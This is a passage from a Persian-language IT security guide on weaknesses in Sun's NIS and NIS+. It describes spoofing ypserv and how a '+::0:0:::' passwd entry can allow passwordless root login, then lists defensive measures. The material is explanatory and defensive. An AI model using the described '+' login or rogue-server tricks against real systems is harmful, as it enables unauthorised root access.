ﻣﺤﻠﻲ ﻋﻮﺽ ﻛﻨﺪ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ypservﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ NISﺧﻮﺩﺵ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭﺁﻭﺭﺩ ،ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﻪ ﺗﻨﻬـﺎ ﺑﺎﻳـﺪ
159 Remote Procedure Call
٣٣٣
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ypbindﻫﺪﻑ ﺭﺍ ﺑﻪ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺷﺎﺭﻩ ﺩﻫﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻳﻚ ﭘـﻮﺭﺕ ﻣﺠـﺎﺯ ﺩﺭﺣـﺎﻝ
ﺍﺟﺮﺍ ﺑﺎﺷﺪ ،ﻭ ﻟﺬﺍ ﭘﺎﺳﺨﻬﺎﻱ ﺁﻥ ﺭﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺷﺪ .ﻣﻬﺎﺟﻢ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ypservﻗﻼﺑﻲ ﺑﻨﻮﻳﺴﺪ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺳـﺎﺯﮔﺎﺭ
ﺑﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ .ﭘﻮﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ ،ﻟﺬﺍ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺭﻭﻱ ﻫـﺮ
ﭘﻮﺭﺗﻲ ﺍﺟﺮﺍ ﻛﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﻧﺪ ypbindﻣﻘﺼﺪ ﺗﺄﻣﻴﻦ ﻧﻤﺎﻳﺪ.
NISﺑﺎ " "+ﺳﺮﺩﺭﮔﻢ ﻣﻲﺷﻮﺩ
ﺣﺘﻲ ﻭﻗﺘﻲ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ NISﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺻﺤﻴﺢ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻣـﻲﻛﻨﻨـﺪ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ NISﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ
ﺩﻳﮕﺮﻱ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺍﺷﺘﺒﺎﻫﺎﺕ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻭﻟﻴﻪ ﻭ ﻣﺠﺪﺩ NISﺑﺎﻋﺚ ﺑﺮﻭﺯ ﺳـﺮﺩﺭﮔﻤﻲﻫـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻋﻼﻣـﺖ
ﺟﻤﻊ ) NIS (+ﺩﺭ ﻓﺎﻳﻞ /etc/passwdﺷﺪﻩ ﺍﺳﺖ.
ﺍﮔﺮ ﺷﻤﺎ ﺍﺯ NISﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﻋﻼﻣﺖ ﺟﻤﻊ ) (+ﺩﺭ ﻓﺎﻳﻞ /etc/passwdﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺎﺷﺪ ،ﻭ ﻧـﻪ
ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ .ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NISﺗﺤﺖ ﺑﻌﻀﻲ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ،Unixﻋﻼﻣﺖ ﺟﻤﻊ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﻌﻨـﻮﺍﻥ
ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺗﻌﺒﻴﺮ ﺷﻮﺩ .ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺸﻜﻞ ،ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻧﺪﺍﺷﺘﻦ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺎ ﻧـﺎﻡ ""+
ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺍﺳﺖ.
ﺗﻼﺵ ﺑﺮﺍﻱ ﻓﻬﻤﻴﺪﻥ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺭﺍ ﺑﺎﻳﺪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﮔﺬﺍﺷﺖ ﻳﻚ ﻣﺸﻜﻞ ﺩﻳﮕﺮ ﺍﺳﺖ .ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ،NISﺧـﻂ
ﺯﻳﺮ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺖ:
+::0:0:::
ﻛﻪ ﺩﺭ SunOSﻭ Solarisﺻﺤﻴﺢ ﺑﻮﺩ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻴﻦ ﻳﻚ ﺧﻂ ﺑﺎﻋﺚ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻳﻚ ﻣﺸﻜﻞ ﻣﻲﺷﺪ .ﻭﻗﺘﻲ NISﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﻧﺒﻮﺩ ،ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻋﻼﻣﺖ ﺟﻤﻊ ﺑﻌﻨـﻮﺍﻥ ﻧـﺎﻡ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﺪ ﻭ ﻫﺮ ﻛﺴﻲ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺗﺎﻳﭗ ﻛﺮﺩﻥ " "+ﺳﻴﺴﺘﻢ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺑﺪﻭﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻪ ﺍﻋـﻼﻥ
١٦٠
ﻓﺮﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ .ﺑﺪﺗﺮ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺁﻥ ﻓﺮﺩ ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﭘﺮﺩﺳﺘﺮﺳﻲﺗﺮﻳﻦ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﻣﻲﺷﺪ.
ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺧﻄﺮ ﺩﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ NISﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ " "+ﺑﻮﺩ .ﻋﻼﻣـﺖ ﺟﻤـﻊ ﺭﺍ
ﺩﺭ ﺣﺎﻟﺖ ﺯﻳﺮ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ:
+::0:0:::
ﻱ " "+ﺑـﺮﺍﻱ ﻭﺭﻭﺩ ﺑـﻪ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩﻫـﺎ ﻭ
ﻳﻜﻲ ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﺍﻫﻬـﺎ ﺑـﺮﺍﻱ ﺭﻭﻳـﺎﺭﻭﻳﻲ ﺑـﺎ ﺍﻳـﻦ ﺳـﺮﺩﺭﮔﻤﻲ ،ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮ ﹺ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NISﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺭﺍ ﺩﺭ ﺁﻭﺭﻳﺪ ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺗﻼﺵ ﻛﻨﻴﺪ ،ﺗﺎ ﺍﺗﻔـﺎﻗﻲ ﻛـﻪ
ﻫﻨﮕﺎﻡ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺍﻓﺘﺪ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷﻮﺩ .ﺩﺭ ﻫﺮ ﺩﻭ ﺣﺎﻟﺖ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﻓﻘﻂ ﺑﺎ ﺗﺎﻳﭗ ﻛـﺮﺩﻥ
" "+ﺑﻌﻨﻮﺍﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﻳﺪ .ﺍﻳﻦ ﺁﺯﻣﻮﻥ ﺑﻪ ﺷﻤﺎ ﺧﻮﺍﻫﺪ ﮔﻔﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺪﺭﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻳﺎ ﺧﻴﺮ.
ﺍﮔﺮ ﻧﺴﺨﺔ ﺟﺪﻳﺪﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ،ﮔﻤﺎﻥ ﻧﻜﻨﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻤﺘﺎﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﺳـﺮﺩﺭﮔﻤﻲ ﺯﻳﺮﺳﻴـﺴﺘﻤﻬﺎﻱ NISﺩﺭ
ﻗﺒﺎﻝ " "+ﺍﻳﻤﻦ ﺍﺳﺖ .ﺑﻄﻮﺭ ﺧﺎﺹ ،ﺑﻌﻀﻲ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ NISﺭﻭﻱ Linuxﻫﻢ ﺍﻳﻦ ﺍﺷﺘﺒﺎﻩ ﺭﺍ ﻣﺮﺗﻜﺐ ﻣﻲﺷﻮﻧﺪ.
۱۶۰ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ Sunﺍﺯ NISﻭ ﺷﺎﻳﺪ ﺑﻌﻀﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺩﻳﮕﺮ ،ﺍﻳﻦ ﺧﻄﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻐﻴﻴـﺮ ﻣﻘـﺎﺩﻳﺮ UIDﻭ GIDﺍﻗـﻼﻡ NISﻣﻮﺟـﻮﺩ ﺩﺭ ﻓﺎﻳـﻞ
passwdﺑﻪ ﺻﻔﺮ ،ﻭ ﻳﺎ ﺳﺎﻳﺮ ﻣﻘﺎﺩﻳﺮ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ ﺑﻪ ﻧﻮﻋﻲ ﺍﺻﻼﺡ ﺷﻮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﺘﺄﺳﻔﺎﻧﻪ ،ﺗﺤﺖ ﺑﻌﻀﻲ ﻧﺴﺨﻪﻫﺎﻱ ،NISﺍﻳﻦ ﻗﻠﻢ ﺩﺍﺩﻩ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ "ﻓﺎﻳﻞ ﻧﮕﺎﺷﺖ passwdﺭﺍ ﻭﺍﺭﺩ ﻛﻦ ،ﺍﻣﺎ ﺗﻤـﺎﻡ ﺭﻣﺰﻫـﺎﻱ
ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﻪ "" ﺗﻐﻴﻴﺮ ﺑﺪﻩ" ،ﻭ ﺍﻳﻨﻜﺎﺭ ﻃﺒﻴﻌﺘﹰﺎ ﺍﺯ ﻭﺭﻭﺩ ﻫﺮ ﻛﺴﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﺮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻭﺟﻮﺩ ﺍﻳـﻦ ﻗﻠـﻢ ﺩﺍﺩﻩ
ﻫﻢ ﺻﺤﻴﺢ ﻧﺒﻮﺩ!
٣٣٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ NIS
ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ NISﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺍﺳﺖ .ﭼﻨﺪﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫـﺎﻱ NIS
ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻣﺜﻞ ﺑﻴﺸﺘﺮ ﺑﻬﺒﻮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺭﺍ ﺍﺩﻏﺎﻡ ﻛﻨﻴﺪ ﺗﺎ ﻳﻚ ﺭﻭﺵ ﺩﻓـﺎﻉ ﺩﺭ ﻋﻤـﻖ ﭼﻨـﺪ ﻻﻳـﻪ
١٦١
ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ:
.١
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﺎ ﺣﺪﺍﻗﻞ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻫﻮﺷﻤﻨﺪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ ﻭ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴﺪ ﺑﺴﺘﻪﻫﺎﻱ UDPﻣﺮﺗﺒﻂ
ﺑﺎ RPCﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻭ ﺩﻧﻴﺎﻱ ﺑﻴﺮﻭﻧﻲ ﻣﺒﺎﺩﻟـﻪ ﺷـﻮﻧﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺑـﻪ ﺍﻳـﻦ ﻋﻠـﺖ ﻛـﻪ RPCﺑـﺮ ﺍﺳـﺎﺱ portmapper
ﭘﺎﻳﻪﺭﻳﺰﻱ ﺷﺪﻩ ﺍﺳﺖ ،ﭘﻮﺭﺕ ﻭﺍﻗﻌﻲ UDPﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ،ﻳﻚ ﭘـﻮﺭﺕ ﺛﺎﺑـﺖ ﻭ ﻣـﺸﺨﺺ ﻧﻴـﺴﺖ .ﺩﺭ ﻋﻤـﻞ ،ﺗﻨﻬـﺎ
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻦ ،ﺳﺪ ﻛﺮﺩﻥ ﺭﺍﻩ ﻫﻤﺔ ﺑﺴﺘﻪﻫﺎﻱ UDPﺍﺳﺖ ،ﺑﺠﺰ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﺧﻮﺩﺗﺎﻥ ﺑﺼﻮﺭﺕ ﺧﺎﺹ ﺍﺟﺎﺯﻩ ﺗﺒﺎﺩﻝ ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺩﻫﻴﺪ.
.٢
ﻧﺴﺨﻪﺍﻱ ﺍﺯ portmapperﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ )ﺑـﺮ ﺍﺳـﺎﺱ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻳـﺎ ﺁﺩﺭﺱ (IPﻛـﻪ
ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﺎﺹ RPCﺑﺎﻳﺪ ﺗﺄﻳﻴﺪ ﻳﺎ ﺭﺩ ﺷﻮﺩ ﺗﻬﻴﻪ ﻛﻨﺪ .ﺍﮔﺮ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﻧﺪﺍﺭﻳـﺪ ﻣﻬـﺎﺟﻢ ﻫﻤﭽﻨـﺎﻥ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ،portmapperﻭﺟﻮﺩ ﻫﺮﻳﻚ ﺍﺯ ﺧﺪﻣﺎﺕ RPCﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ ،ﺍﻣﺎ ﺍﮔﺮ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ RPCﺍﺑﺘـﺪﺍ
ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ portmapperﺗﻼﺵ ﻛﻨﻨﺪ ،ﻳﻚ ﻧﺴﺨﺔ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﺔ NISﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺯﻣﻴﻨﺔ ﻭﻗﻮﻉ ﻳـﻚ ﺣﻤﻠـﺔ ﺑـﺎﻟﻘﻮﻩ
ﻫﺸﺪﺍﺭ ﺩﻫﺪ.
.٣
ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ NISﺷﻤﺎ ﺍﺯ ﻓﺎﻳﻞ /var/yp/securenetsﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ NISﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ .ﺍﮔﺮ ﺍﻳـﻦ ﻓﺎﻳـﻞ
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ NISﺭﺍ ﺩﺍﺭﻧﺪ ﻣﺸﺨﺺ ﻛﻨﺪ .ﻧﮕﺎﺭﺷـﻬﺎﻱ ﺩﻳﮕـﺮ
ﻻ ﺑﺮﺍﻱ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﺁﺩﺭﺳﻬﺎﻳﻲ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺧـﺎﺹ RPCﺗﻮﺳـﻂ ypserveﻣﺠـﺎﺯ
NISﺍﺣﺘﻤﺎ ﹰ
ﺍﺳﺖ ،ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ.
.٤
ﺁﻧﻘﺪﺭ ﺍﺯ NISﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ﻛﻪ DNSﺍﺯ ﻳﺎﺩﺗﺎﻥ ﺑﺮﻭﺩ! ﺍﮔﺮ ﺑﻨﺎﻱ ﺷﻤﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛـﺴﻲ ﺍﺯ ﺑﻴـﺮﻭﻥ ﻧﺘﻮﺍﻧـﺪ ﺁﺩﺭﺳـﻬﺎﻱ IPﺍﺩﺍﺭﺓ
ﺷﻤﺎ ﺭﺍ ﺑﻔﻬﻤﺪ ،ﺩﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ١٦٢ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ -ﻳﻜﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺍﺧﻠﻲ ﻭ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺧﺎﺭﺟﻲ.
NIS+ﺷﺮﻛﺖ Sun
NISﺑﺮﺍﻱ ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻛﻮﭼﻚ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑـﻮﺩ .ﻭﻗﺘـﻲ ﻣـﺸﺘﺮﻳﺎﻥ ﺷـﺮﻛﺖ Sun Microsystemsﺷـﺮﻭﻉ ﺑـﻪ
ﺳﺎﺧﺖ ﺷﺒﻜﻪﻫﺎﻳﻲ ﺑﺎ ﻫﺰﺍﺭﺍﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺮﺩﻧﺪ ،ﻣﻌﻠﻮﻡ ﺷﺪ NISﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻏﻴﺮﻛـﺎﺭﺑﺮﺩﻱ ﻭ ﻧـﺎﺍﻣﻦ ﺍﺳـﺖ .ﺩﺭ
ﺳﺎﻝ ۱۹۹۰ﺷﺮﻛﺖ Sun Microsystemsﺗﻬﻴﺔ ﻳﻚ NISﺟﺎﻳﮕﺰﻳﻦ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ ﻭ ﭼﻨﺪ ﺳـﺎﻝ ﺑﻌـﺪ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﺗﺤـﺖ ﻋﻨـﻮﺍﻥ
NIS+ﻋﺮﺿﻪ ﺷﺪ.
ﻼ ﻣﻮﺭﺩ ﺁﺯﻣﻮﻥ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘـﻪ ﺑﻮﺩﻧـﺪ ،ﭼﺮﺍﻛـﻪ ﺑـﻪ
NIS+ﺑﺴﺮﻋﺖ ﺑﻪ ﺧﺮﺍﺏ ﺑﻮﺩﻥ ﺷﻬﺮﺕ ﻳﺎﻓﺖ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺁﻥ ﻋﻤ ﹰ
ﻧﺪﺭﺕ ﻃﺒﻖ ﺁﻧﭽﻪ ﻛﻪ ﻗﺮﺍﺭ ﺑﻮﺩ ﻋﻤﻞ ﻣﻲﻛﺮﺩﻧﺪ .ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ،ﺳﻨﺪﺑﺮﺩﺍﺭﻱ ﺁﻥ ﺑﺴﻴﺎﺭ ﮔﻴﺞﻛﻨﻨﺪﻩ ﻭ ﻧﺎﻗﺺ ﺑـﻮﺩ .ﺩﺭ ﻧﻬﺎﻳـﺖ Sunﻧﻘـﺎﻳﺺ
ﺁﻧﺮﺍ ﺭﻓﻊ ﻛﺮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻣﺮﻭﺯ NIS+ﻳﻚ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥﺗﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻭ ﻛﻨﺘﺮﻝ ﺍﻳﻤﻦ ﺷﺒﻜﻪ ﺍﺳﺖ .ﻳﻚ ﻣﺮﺟـﻊ ﻋـﺎﻟﻲ ﺑـﺮﺍﻱ
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ NIS+ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﺘﺎﺏ ﻫﻤﻪ ﭼﻴﺰ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻫﺒﺮﻱ ١٦٣NIS+ﻧﻮﺷﺘﻪ ﺭﻳﻚ ﺭﻣﺰﻱ ١٦٤ﺍﺳﺖ.
Layered Defense-in-Depth
Nameserver
)All About Administrating NIS+ (SunSoft Press, Prentice Hall, 1994
Rick Ramsey
161
162
163
164
٣٣٥
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻛﺎﺭﻱ ﻛﻪ NIS+ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ
NIS+ﺩﺭ ﺷﺒﻜﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺳـﺎﺯﻣﺎﻥ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﺩ NIS+ .ﺍﻳـﻦ
ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎ ﺭﺍ "ﺟﺪﻭﻝ" ﻣﻲﻧﺎﻣﺪ .ﺍﻳﻦ ﺟﺪﻭﻟﻬﺎ ﺍﺯ ﻧﻈﺮ ﻋﻤﻠﻜﺮﺩ ﻣﺸﺎﺑﻪ ﻧﮕﺎﺷﺘﻬﺎﻱ NISﻫﺴﺘﻨﺪ .ﺑﺮ ﺧﻼﻑ NIS+ ،NISﺍﺯ ﻃﺮﻳﻖ ﺷـﺒﻜﻪ
ﺍﻣﻜﺎﻥ ﺍﺻﻼﺡ ﺍﻓﺰﺍﻳﺸﻲ ١٦٥ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ.
